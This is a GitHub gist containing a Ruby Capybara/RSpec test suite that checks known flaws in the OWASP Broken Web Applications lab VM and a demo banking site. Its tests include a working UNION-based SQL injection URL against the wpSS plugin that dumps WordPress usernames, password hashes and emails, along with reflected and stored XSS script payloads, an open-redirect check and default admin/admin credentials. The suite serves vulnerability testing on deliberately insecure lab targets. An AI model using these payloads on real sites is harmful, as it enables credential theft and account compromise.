Skip to content

Instantly share code, notes, and snippets.

@ncoblentz

ncoblentz/OWASP Broken WebApps Capybara.rb

Created November 22, 2011 21:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save ncoblentz/1386988 to your computer and use it in GitHub Desktop.
Save ncoblentz/1386988 to your computer and use it in GitHub Desktop.
Download ZIP
OWASP Broken Web Applications Application Vulnerability Unit Testing Capybara Test
Raw
OWASP Broken WebApps Capybara.rb
# encoding: utf-8
#http://code.google.com/p/owaspbwa/wiki/ProjectSummary
#http://sourceforge.net/apps/trac/owaspbwa/report/1
require 'capybara/rspec'
Capybara.default_driver = :selenium
Capybara.run_server = false
#page = Capybara::Session.new(:selenium)
describe 'OWASP Broken Web App: Wordpress', :type=>:request, :app=>'owasp_broken' do
before(:all) { Capybara.app_host = 'http://owaspbwa' }
context "Without authenticating", :type=>'authorization' do
specify "I should be able to access the blog" do
visit '/wordpress/'
within('head title') do
page.should have_content('Broken WordPress')
end
end
specify "I should be able to access the login page" do
visit '/wordpress/wp-login.php'
within('head title') do
page.should have_content('Login')
end
end
specify "I should not be able to access the WordPress Admin page" do
visit '/wordpress/wp-admin/'
within('head title') do
page.should have_content('Login')
end
end
end
context "After logging in as 'admin'," do
before(:each) do
visit '/wordpress/wp-login.php'
fill_in "log", :with => "admin"
fill_in "pwd", :with => "admin"
click_button "submit"
end
specify "the page should list 'admin' as the authenticated user" do
within('strong') do
page.should have_content('admin')
end
end
specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do
visit '/wordpress/wp-admin/'
within('head title') do
page.should have_content('Dashboard')
end
end
specify "I should be able to access the User Admin page", :type=>'authorization' do
visit '/wordpress/wp-admin/users.php'
within('head title') do
page.should have_content('Users')
end
end
context 'After logging out, visiting the login page, and pressing the down arrow', :type=>'autocomplete' do
specify "I shold see autocompleted usernames" do
visit '/wordpress/wp-login.php'
fill_in 'log', :with =>''
find_field('log').native.send_keys(:arrow_down)
sleep 1
find_field('log').native.send_keys(:arrow_down)
sleep 1
find_field('log').native.send_keys(:return)
sleep 1
content = find_field('log').value
content.should_not be_nil
content.should_not eq('')
content.length > 0
end
end
end
context "After logging in as 'user'," do
before(:each) do
visit '/wordpress/wp-login.php'
fill_in "log", :with=> "user"
fill_in "pwd", :with=> "user"
click_button "submit"
end
specify "the page should list 'user' as the authenticated user" do
within('strong') do
page.should have_content('user')
end
end
specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do
visit '/wordpress/wp-admin/'
within('head title') do
page.should have_content('Dashboard')
end
end
specify "I should be not able to access the User Admin page", :type=>'authorization' do
visit '/wordpress/wp-admin/users.php'
page.should have_content('You do not have sufficient permissions to access this page.')
end
end
context 'On the ss_load.php page,', :type=>'sqli' do
context 'When I enter a single quote into the ss_id URL parameter,' do
before(:all) do
visit "/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id='"
end
specify 'The application should respond with an SQL error message' do
page.should have_content("You have an error in your SQL syntax")
end
end
context 'When I enter an SQL Injection Payload,' do
before(:all) do
visit %q|/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--|
end
specify "I should see the 'admin' account details" do
within('#s1_spreadsheetBars') do
page.should have_content('admin@example.org')
end
end
end
end
end
describe 'OWASP Broken Web App: AWStats', :type=>:request, :app=>'owasp_broken' do
context "When entering an XSS payload into the 'editList.php' page, ",:type=>'xss' do
before(:all) do
visit %q|/gtd-php/editList.php?listTitle=<script>alert('Achieved JavaScript Context')</script>|
end
specify 'An alert box should be displayed' do
expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
end
end
context "When entering an XSS payload into the 'newChecklist.php' page", :type=>'stored_xss' do
before(:all) do
visit '/gtd-php/newChecklist.php'
fill_in 'title', :with => %q|"><script>alert(1)</script>|
fill_in 'description', :with => 'asdf'
click_button 'Add Checklist'
end
specify 'I should see an alert box after submitting the form' do
expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
end
context "When visiting the 'listChecklist.php' page, " do
specify 'I should see an alert box' do
expect { page.driver.browser.switch_to.alert.accept }.to_not raise_error
end
end
end
context "When visiting the 'awredir.pl' page and specifying a 'url' of 'google.com', ", :type=>'open_redirect' do
before(:all) { visit '/awstats/awredir.pl?url=google.com' }
specify "The browser should be redirected to 'google.com'" do
within('head title') do
page.should have_content('Google')
end
end
end
end
describe "Freebank", :type=>:request, :app=>'freebank' do
before(:all) { Capybara.app_host = 'http://zero.webappsecurity.com' }
context 'When submitting a single quote in the user id field of the login page,', :type=>'freebank' do
before(:all) do
visit '/'
fill_in 'login', :with=>%q|asdf'|
fill_in 'password', :with=>'asdf'
click_button 'Access Accounts'
end
specify 'I should see a database error message displayed' do
page.should have_content '[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression'
end
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment